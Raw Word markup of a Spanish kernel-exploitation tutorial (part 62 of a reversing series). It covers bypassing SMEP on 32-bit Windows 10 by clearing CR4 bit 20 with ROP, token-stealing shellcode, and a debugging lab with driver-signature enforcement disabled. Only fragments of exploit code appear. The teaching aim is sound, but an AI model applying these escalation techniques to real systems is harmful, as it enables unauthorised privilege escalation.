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BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_kjic3i1lp9o6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>INTRODUCCIÓN AL REVERSING CON IDA PRO DESDE CERO PARTE 62.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Retornamos </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>después</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las vacaciones con nuevos tutoriales, en este caso veremos la variante de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>explotación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> del mismo driver que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>vimos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Windows 7 de 32 bits, ahora en Windows 10 de 32 bits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La diferencia como dijimos esta en SMEP y que es eso, es la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>protección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para evitar saltar de kernel a ejecutar </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve">páginas marcadas como </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> como hacemos en los ejemplos que vimos hasta ahora que allocamos una </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>página</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en user con permiso de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>ejecución</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y cuando tomamos control de la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>misma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> saltamos </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>allí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dond</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el shellcode</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve"> directamente</w:t>
      </w:r>
      <w:r>
        <w:t>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El que quiere profundizar sobre el tema smep</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>acá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hay una muy buena </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>explicación,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en ingles pero se entiende.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf</w:t>
        </w:r>
      </w:hyperlink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6055" cy="3416935"/>
            <wp:effectExtent l="0" t="0" r="10795" b="120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6F027A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> bit 20 del registro de DEBUG cr4 es el que si esta prendido (1) habilita la </w:t>
      </w:r>
      <w:r>
        <w:t>protección</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> SMEP, por lo tanto para que no funcione </w:t>
      </w:r>
      <w:r>
        <w:t>habrá</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> que poner a cero (0) ese bit con </w:t>
      </w:r>
      <w:r>
        <w:t>algún</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> rop</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> antes de saltar a ejecutar el bloque allocado en USER.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70500" cy="2371090"/>
            <wp:effectExtent l="0" t="0" r="635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Allí</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> vemos buf que era el buffer ejecutable creado en USER con permiso de </w:t>
      </w:r>
      <w:r>
        <w:t>ejecución</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> donde luego</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t>saltamos directo a ejecutar cuando producimos el overflow y pisamos el return a</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t>dress.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1770" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="508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Allí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con la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dirección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del buffer de user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>pisábamos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el return address y el </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A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struct.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="DF431C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F027A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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>"&lt;L"</w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A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,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0BAD0B0B0 </w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A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hd w:val="clear" w:color="auto" w:fill="FFFFFF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</w:pP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Evitaba que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A"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>siguiéramos</w:t>
      </w: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 copiando </w:t>
      </w:r>
      <w:r w:rsidR="006F027A"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>más</w:t>
      </w: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 abajo, </w:t>
      </w:r>
      <w:r w:rsidR="006F027A"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>ya que</w:t>
      </w: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 </w:t>
      </w:r>
      <w:r w:rsidR="006F027A"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>salía</w:t>
      </w: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 del loop y terminaba de copiar.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114300" distR="114300">
            <wp:extent cx="5266055" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="10795" b="127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>Antes que nada debemos decir que para que funcione Windows 10 como host</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve"> de debugging de kernel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, luego de instalar VKD como vimos en los </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>capítulos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> anteriores y antes de reiniciar se debe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tipear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve"> por única vez</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en una consola con permiso de administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="212121"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>BCDEDIT /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dbgsettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> serial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</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>ahí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F027A">
        <w:t>, reiniciamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, otra cosa que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>verán</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es que al </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>reiniciar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> les </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>saldrá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> algo como esto.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4785" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="12065" b="152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Donde </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>deberán</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> apretar f8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64785" cy="3992245"/>
            <wp:effectExtent l="0" t="0" r="1206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</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>allí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deshabilitar la firma de drivers a la fuerza</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que impide cargar el driver de VKD </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>además</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que nos </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>permitirá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cargar el driver para explotar que obviamente no </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> firmado.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En el caso de explotar un driver de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>algún programa o hardware estará</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> firmado y cargara sin problemas.</w:t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Después</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> de todo eso</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t>rrancara el windbg y breakeara, seguimos apretando</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> G</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">continuara </w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r>
        <w:t>ejecución</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> hasta que arranque el sistema.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9230" cy="31191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Cargo el driver con OSRLOADER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6690" cy="3923665"/>
            <wp:effectExtent l="0" t="0" r="1016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REGISTER SERVICE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328416" cy="3409802"/>
            <wp:effectExtent l="0" t="0" r="571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561" cy="34232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027A" w:rsidRDefault="006F027A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Y luego START SERVICE.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Ya sabemos que si queremos probar los exploits en </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deberemos instalarlo en el target y ponerlo en las environment variables, sino </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>habrá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que compilarlo en C o C++ con el runtime embebido, lo cual corre sin problemas.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Ahora debemos </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agregar un ROP que deshabilite SMEP (se </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>debería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detectar la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exacta de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>según</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cual sea</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que el script use el rop </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve">específico </w:t>
      </w:r>
      <w:r>
        <w:t>para cada una</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ya que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>será</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> diferente en cada caso, este script que estoy haciendo como es solo para una </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exacta de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no le funcionara al que lo pruebe en otro Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modificar el shellcode para robar el Token que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>usábamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en Windows 7</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>aquí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no funcionara porque las estructuras cambian un poco.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Recuerden que el ROP es relativo a la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en mi caso de ntoskrnl.exe en mi caso es 10.0.15063.483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669881" cy="3262579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798" cy="32673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Que corresponde a esta </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Windows</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve"> en otra versión no funcionara.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847795" cy="2888745"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985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601" cy="28931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Por supuesto desde una consola de usuario normal se puede saber la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por lo cual en un exploit profesional se detectara la misma y </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>según</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cual sea se enviara el rop correcto para cada una.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Pero en mi caso lo hare solo para esa </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t>, no tengo ganas de trabajar tanto</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F027A">
        <w:t>jeje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ustedes para practicar pueden hacerlo.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1610" cy="2832735"/>
            <wp:effectExtent l="0" t="0" r="15240" b="5715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Pondré</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> un breakpoint al salir del loop</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> pero antes de quitar el windbg mirare el valor de los registers, luego de hacer debug-break.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159250" cy="1829435"/>
            <wp:effectExtent l="0" t="0" r="12700" b="18415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Allí</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> tenemos para ver los registros completos, </w:t>
      </w:r>
      <w:r>
        <w:t>también</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> hay un comando que es r y algo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D26CF">
        <w:t>mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para ver los debug registers,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> pero ahora me olvide los miro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D26CF">
        <w:t>ahi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D26CF">
        <w:t>jeje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D26CF">
        <w:t>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057015" cy="2299970"/>
            <wp:effectExtent l="0" t="0" r="635" b="508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Vemos que el valor de cr4 es 6e9, y obvio el bit 20 esta deshabilitado, pero como puede ser si estoy en </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10, je.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Si paso a binario 0x6e9.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0x6e9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>0b11011101001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Si el </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bajo es el bit 0</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es obvio que rellenando con ceros a la izquierda hasta completar los 32 bits.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>0b000000000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>00000000011011101001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El que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en negrita es el bit 20 y </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a cero por lo cual en esta </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> puedo ejecutar sin tener problemas con SMEP</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>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2405" cy="3972560"/>
            <wp:effectExtent l="0" t="0" r="4445" b="889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Sospecho o de la </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>versión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vieja de VMWARE que no debe soportar SMEP, o por </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>ahí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la maquina HOST es muy vieja, por si acaso instale VMWARE 14 en una maquina </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nueva y cuando repito el procedimiento con el mismo target de Windows 10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68595" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="8255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Bueno </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>acá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es otra cosa</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> si vemos ese valor en binario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0x1406e9)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'0b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>01000000011011101001'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Vemos que el bit 20 </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a 1</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>así</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>aquí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMEP si </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
